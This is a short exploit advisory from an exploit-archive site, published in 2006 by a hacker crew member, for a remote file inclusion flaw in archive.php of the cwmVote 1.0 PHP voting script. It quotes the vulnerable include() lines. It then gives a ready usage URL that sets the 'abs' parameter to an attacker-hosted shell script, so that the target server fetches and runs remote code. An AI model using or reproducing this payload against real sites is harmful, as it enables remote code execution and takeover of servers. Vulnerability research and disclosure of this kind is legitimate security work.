id: 1274
date: 12/19/2006
title: cwmVote 1.0 (archive.php) Remote File Include Vulnerability
author: bd0rk
cves: 

===========================================================
cwmVote 1.0 (archive.php) Remote File Include Vulnerability
===========================================================



################################################################
#                                                              #
#            cwmVote 1.0 File Include Vulnerability            #
#                                                              #
# F0und3R: bd0rk || SOH-Crew                                   #
#                                                              #
################################################################

Vulnerable Code in archive.php


Code: include($abs."inc/functions.inc.php");
include($abs."inc/conf.mysql.inc.php");
include($abs."inc/conf.pw.inc.php");

Usage: http://[target]/[cwm_vote_path]/archive.php?abs=http://[Shellscript]

Greetings: TheJT, Lu7k, Kacper, nukedx, str0ke


#  0day.today [2023-03-23]  #